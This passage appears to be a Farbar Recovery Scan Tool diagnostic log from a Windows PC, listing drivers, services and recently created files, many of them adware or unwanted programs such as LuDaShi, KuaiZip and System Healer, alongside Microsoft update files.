    R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    S3 stmtpm; C:\Windows\system32\drivers\stm_tpm.sys [29184 2012-05-25] (STMicroelectronics, INC)
    R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-11-06] (STMicroelectronics)
    S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13920 2016-09-16] ()
    S3 tcm; C:\Windows\system32\drivers\tcm.sys [17048 2012-07-04] ()
    S1 bsdpf64; \??\C:\WINDOWS\system32\Drivers\bsdpf64.sys [X]
    S1 bsdpr64; \??\C:\WINDOWS\system32\Drivers\bsdpr64.sys [X]
    S2 ComputerZLock; \??\C:\Program Files (x86)\LuDaShi\ComputerZLock_x64.sys [X] <==== ATTENTION
    S3 ComputerZ_x64; \??\C:\Program Files (x86)\LuDaShi\ComputerZ_x64.sys [X] <==== ATTENTION

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ==> No File

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-18 11:57 - 2016-09-18 11:57 - 02399232 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
    2016-09-18 11:57 - 2016-09-18 11:57 - 00023903 _____ C:\Users\Administrator\Downloads\FRST.txt
    2016-09-18 11:57 - 2016-09-18 11:57 - 00000000 ____D C:\FRST
    2016-09-18 11:05 - 2016-09-18 11:09 - 00172700 _____ C:\WINDOWS\ntbtlog.txt
    2016-09-18 10:49 - 2016-09-18 10:50 - 49521912 _____ (www.ludashi.com) C:\Users\Administrator\Downloads\ludashisetup.exe
    2016-09-18 10:48 - 2016-09-18 11:44 - 00001207 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 11:44 - 00001195 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2016-09-18 10:45 - 2016-09-18 10:46 - 00000000 ____D C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431
    2016-09-18 09:15 - 2016-09-18 09:15 - 00003110 _____ C:\WINDOWS\System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00003120 _____ C:\WINDOWS\System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00000000 ____D C:\WINDOWS\system32\appmgmt
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003586 _____ C:\WINDOWS\System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F}
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003106 _____ C:\WINDOWS\System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0}
    2016-09-18 09:06 - 2016-09-18 09:06 - 00003594 _____ C:\WINDOWS\System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080}
    2016-09-18 08:49 - 2016-09-18 08:49 - 00000000 ____D C:\WINDOWS\system32\guu
    2016-09-18 08:12 - 2016-09-18 11:14 - 00000053 _____ C:\Users\Administrator\AppData\Roaming\st
    2016-09-18 08:06 - 2016-09-18 08:50 - 00000356 _____ C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job
    2016-09-18 08:06 - 2016-09-18 08:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\lockhomepage
    2016-09-18 08:06 - 2016-09-18 08:06 - 00002736 _____ C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator
    2016-09-18 08:05 - 2016-09-18 09:57 - 00000000 ____D C:\Program Files (x86)\LuDaShib
    2016-09-18 08:05 - 2016-09-18 09:52 - 00003408 _____ C:\WINDOWS\System32\Tasks\ComputerZ-Tray
    2016-09-18 08:05 - 2016-09-18 08:11 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Ludashi
    2016-09-18 08:05 - 2016-09-18 08:06 - 00000000 ____D C:\ProgramData\Ronzaps
    2016-09-18 08:05 - 2016-09-18 08:06 - 00000000 ____D C:\ProgramData\Doubleings
    2016-09-18 08:05 - 2016-09-18 08:05 - 00002397 _____ C:\WINDOWS\SysWOW64\findit.xml
    2016-09-18 08:05 - 2016-09-18 08:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师
    2016-09-18 08:04 - 2016-09-18 09:10 - 00000000 ____D C:\Users\Administrator\AppData\Local\WikiZ
    2016-09-18 08:04 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\nplusb
    2016-09-18 08:04 - 2016-09-18 08:04 - 02279413 _____ C:\Users\Administrator\AppData\Roaming\True-Top.bin
    2016-09-18 08:04 - 2016-09-18 08:04 - 02279413 _____ C:\Users\Administrator\AppData\Roaming\MedJob.bin
    2016-09-18 08:04 - 2016-09-18 08:04 - 02279413 _____ C:\Users\Administrator\AppData\Roaming\Betastock.bin
    2016-09-18 08:04 - 2016-09-18 08:04 - 01903938 _____ C:\Users\Administrator\AppData\Roaming\Tipair.tst
    2016-09-18 08:04 - 2016-09-18 08:04 - 00072823 _____ C:\Users\Administrator\AppData\Roaming\Labin.tst
    2016-09-18 08:04 - 2016-09-18 08:04 - 00000000 ____D C:\ProgramData\Logic Handler
    2016-09-18 08:04 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Tipair.exe
    2016-09-18 08:04 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Labin.exe
    2016-09-18 08:03 - 2016-09-18 11:29 - 00000000 ____D C:\ProgramData\Ronzap
    2016-09-18 08:03 - 2016-09-18 09:49 - 00000000 ____D C:\Program Files (x86)\KuaiZipb
    2016-09-18 08:03 - 2016-09-18 09:06 - 00000000 ____D C:\ProgramData\Doubleing
    2016-09-18 08:03 - 2016-09-18 08:04 - 07090176 _____ C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00126464 _____ C:\Users\Administrator\AppData\Roaming\noah.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00126464 _____ C:\Users\Administrator\AppData\Roaming\lobby.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00070704 _____ C:\Users\Administrator\AppData\Roaming\Config.xml
    2016-09-18 08:03 - 2016-09-18 08:04 - 00054272 _____ C:\Users\Administrator\AppData\Roaming\ApplicationHosting.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00018432 _____ C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00005568 _____ C:\Users\Administrator\AppData\Roaming\md.xml
    2016-09-18 08:03 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\VillaStattom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Triodom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 01903938 _____ C:\Users\Administrator\AppData\Roaming\Triodom.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 01903938 _____ C:\Users\Administrator\AppData\Roaming\Freshdinfind.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 00093072 _____ (WinMount International Inc) C:\WINDOWS\system32\Drivers\KuaiZipDrive2.sys
    2016-09-18 08:03 - 2016-09-18 08:03 - 00072823 _____ C:\Users\Administrator\AppData\Roaming\VillaStattom.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 00072823 _____ C:\Users\Administrator\AppData\Roaming\Koncom.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 00004092 _____ C:\WINDOWS\System32\Tasks\e02c4bd5-54d5-4470-9ea0-a68d88112c00
    2016-09-18 08:03 - 2016-09-18 08:03 - 00003358 _____ C:\WINDOWS\System32\Tasks\KuaiZip_Update
    2016-09-18 08:03 - 2016-09-18 08:03 - 00003260 _____ C:\WINDOWS\System32\Tasks\nerta
    2016-09-18 08:03 - 2016-09-18 08:03 - 00001041 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\KuaiZip.lnk
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Softlink
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\KuaiZip
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\A
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\ProgramData\CloudPrinter
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Program Files (x86)\Stlr
    2016-09-18 08:03 - 2016-09-18 08:01 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Koncom.exe
    2016-09-18 08:03 - 2016-09-18 08:01 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Freshdinfind.exe
    2016-09-18 08:02 - 2016-09-18 08:02 - 00003040 _____ C:\WINDOWS\System32\Tasks\ttwifi
    2016-09-18 08:02 - 2016-09-18 08:02 - 00002988 _____ C:\WINDOWS\System32\Tasks\Pritc
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\Users\Administrator\AppData\LocalLow\Company
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\Users\Administrator\AppData\Local\WINTUNEPRO
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\uninst
    2016-09-18 08:01 - 2016-09-18 09:55 - 00000000 ____D C:\Program Files (x86)\sunnydayb
    2016-09-18 08:01 - 2016-09-18 09:10 - 00000000 ____D C:\Program Files (x86)\hostb
    2016-09-18 08:01 - 2016-09-18 08:50 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 08:01 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\Icattib
    2016-09-18 08:01 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files\IcattiUnb
    2016-09-18 08:01 - 2016-09-18 08:03 - 00018528 _____ C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml
    2016-09-18 08:01 - 2016-09-18 08:01 - 00140288 _____ C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\QuickCleaner
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Local\Tempfolder
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\ProgramData\desktopfindkey
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Program Files (x86)\Win Tune Pro
    2016-09-18 08:00 - 2016-09-18 08:12 - 00000000 ____D C:\Users\Administrator\AppData\Local\app
    2016-09-18 07:59 - 2016-09-18 09:47 - 00000000 ____D C:\Program Files (x86)\DPowerb
    2016-09-18 07:59 - 2016-09-18 09:07 - 00000000 ____D C:\Users\Administrator\AppData\Local\AppTrailers
    2016-09-18 07:59 - 2016-09-18 07:59 - 00895488 _____ C:\Users\Administrator\AppData\Local\misgua.dll
    2016-09-18 07:59 - 2016-09-18 07:59 - 00002560 _____ C:\Users\Administrator\AppData\Local\uninstallssl.exe
    2016-09-18 07:59 - 2016-09-18 07:59 - 00000000 ____D C:\Program Files\Casterb
    2016-09-18 07:58 - 2016-09-18 09:58 - 00000000 ____D C:\Program Files (x86)\mpck
    2016-09-18 07:58 - 2016-09-18 09:41 - 00000000 ____D C:\Users\Administrator\AppData\Local\Apps\2.0
    2016-09-18 07:58 - 2016-09-18 07:59 - 00000000 ____D C:\Program Files (x86)\EasyHotspotb
    2016-09-18 07:58 - 2016-09-18 07:58 - 00441344 _____ C:\ProgramData\smp2.exe
    2016-09-18 07:58 - 2016-09-18 07:58 - 00004182 _____ C:\WINDOWS\System32\Tasks\SMW_P
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____H C:\WINDOWS\system32\BIT1C02.tmp
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\tuto_monetize_120160918
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____D C:\Program Files\Common Files\Noobzo
    2016-09-18 07:57 - 2016-09-18 07:57 - 00003514 _____ C:\WINDOWS\System32\Tasks\bvyvcvd
    2016-09-18 07:56 - 2016-09-18 08:48 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\NUIns
    2016-09-18 07:56 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431
    2016-09-18 07:56 - 2016-09-18 07:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\SearchProtect
    2016-09-18 07:56 - 2016-09-18 07:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\bvyvcvd
    2016-09-18 07:56 - 2016-09-18 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader
    2016-09-18 07:55 - 2016-09-18 11:27 - 00000288 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
    2016-09-18 07:55 - 2016-09-18 09:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\K9Tools
    2016-09-18 07:55 - 2016-09-18 08:51 - 00002936 _____ C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
    2016-09-18 07:55 - 2016-09-18 08:51 - 00002936 _____ C:\WINDOWS\system32\LavasoftTcpServiceOff.ini
    2016-09-18 07:55 - 2016-09-18 08:50 - 00000288 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
    2016-09-18 07:55 - 2016-09-18 07:56 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 07:55 - 2016-09-18 07:55 - 00425744 _____ (Lavasoft Limited) C:\WINDOWS\system32\LavasoftTcpService64.dll
    2016-09-18 07:55 - 2016-09-18 07:55 - 00345360 _____ (Lavasoft Limited) C:\WINDOWS\SysWOW64\LavasoftTcpService.dll
    2016-09-18 07:55 - 2016-09-18 07:55 - 00024264 _____ C:\WINDOWS\System32\Tasks\{78047A47-0C79-0578-0A11-0C7F0F7A117D}
    2016-09-18 07:55 - 2016-09-18 07:55 - 00003584 _____ C:\WINDOWS\System32\Tasks\System Healer Task
    2016-09-18 07:55 - 2016-09-18 07:55 - 00003344 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
    2016-09-18 07:55 - 2016-09-18 07:55 - 00003278 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
    2016-09-18 07:55 - 2016-09-18 07:55 - 00002880 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
    2016-09-18 07:55 - 2016-09-18 07:55 - 00002578 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\K9AMW
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashRpt
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\4f8a1888-71e5-0
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\4f8a1888-4c51-1
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\1f0ab4e9-7297-1
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\1f0ab4e9-4821-0
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
    2016-09-16 21:23 - 2016-09-16 21:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-09-16 21:23 - 2016-09-16 21:23 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-09-16 21:12 - 2016-09-18 08:50 - 00000000 ____D C:\SUPERDelete
    2016-09-16 18:50 - 2016-09-16 18:50 - 01014080 _____ ( ) C:\Users\Administrator\Downloads\Firefox_Setup(1).exe
    2016-09-16 18:49 - 2016-09-16 18:50 - 40326904 _____ C:\Users\Administrator\Downloads\Firefox_Setup.exe
    2016-09-16 18:47 - 2016-09-18 11:27 - 00000434 _____ C:\WINDOWS\Tasks\DriverUpdate Startup.job
    2016-09-16 18:47 - 2016-09-17 18:47 - 00000488 _____ C:\WINDOWS\Tasks\DriverUpdate Scan.job
    2016-09-16 18:47 - 2016-09-16 18:47 - 00003232 _____ C:\WINDOWS\System32\Tasks\DriverUpdate Scan
    2016-09-16 18:47 - 2016-09-16 18:47 - 00002876 _____ C:\WINDOWS\System32\Tasks\DriverUpdate Startup
    2016-09-16 18:46 - 2016-09-16 21:14 - 00000000 ____D C:\Users\Administrator\AppData\Local\SlimWare Utilities Inc
    2016-09-16 18:46 - 2016-09-16 18:46 - 00985288 _____ (Slimware Utilities Holdings, Inc.) C:\Users\Administrator\Downloads\DriverUpdate-setup.exe
    2016-09-16 18:46 - 2016-09-16 18:46 - 00013920 _____ C:\WINDOWS\system32\Drivers\SWDUMon.sys
    2016-09-16 18:46 - 2016-09-16 18:46 - 00000000 ____D C:\Users\Public\Documents\Downloaded Installers
    2016-09-16 10:46 - 2016-09-16 11:05 - 00000000 ____D C:\aa Canon 450D Master acum
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\WINDOWS\PCHEALTH
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 __RHD C:\MSOCache
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Program Files\Microsoft Office
    2016-09-16 10:34 - 2016-09-16 10:35 - 266433120 _____ (Microsoft Corporation) C:\Users\Administrator\Downloads\SharePointDesigner.exe
    2016-09-14 01:10 - 2016-09-01 15:26 - 00394440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2016-09-14 01:10 - 2016-09-01 14:41 - 00346320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2016-09-14 01:10 - 2016-08-31 23:18 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 23:08 - 20312064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 22:48 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
    2016-09-14 01:10 - 2016-08-31 22:46 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 22:44 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 22:34 - 02286592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 22:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 22:23 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 22:08 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 21:59 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 21:57 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inseng.dll
    2016-09-14 01:10 - 2016-08-31 21:53 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2016-09-14 01:10 - 2016-08-31 21:52 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 21:48 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 21:45 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\occache.dll
    2016-09-14 01:10 - 2016-08-31 21:34 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 21:30 - 00692736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 21:29 - 02055680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 21:29 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 21:27 - 13808128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 21:24 - 04607488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:45 - 25770496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 20:43 - 02445824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-09-14 01:10 - 2016-08-31 20:42 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-31 20:40 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 20:40 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollectorres.dll
    2016-09-14 01:10 - 2016-08-31 20:38 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 20:25 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 02894336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
    2016-09-14 01:10 - 2016-08-31 20:24 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 20:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 20:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 20:12 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
    2016-09-14 01:10 - 2016-08-31 20:11 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 20:11 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
    2016-09-14 01:10 - 2016-08-31 20:10 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2016-09-14 01:10 - 2016-08-31 20:10 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 20:06 - 06047232 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:03 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.exe
    2016-09-14 01:10 - 2016-08-31 19:59 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 19:51 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 19:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
    2016-09-14 01:10 - 2016-08-31 19:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2016-09-14 01:10 - 2016-08-31 19:46 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 19:44 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 19:42 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
    2016-09-14 01:10 - 2016-08-31 19:31 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 19:29 - 00724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2016-09-14 01:10 - 2016-08-31 19:28 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 19:27 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 19:26 - 02131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 19:15 - 15411712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 19:10 - 02921472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-09-14 01:10 - 2016-08-31 18:58 - 01550848 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 18:47 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
    2016-09-14 01:09 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
    2016-09-14 01:09 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
    2016-09-14 01:09 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
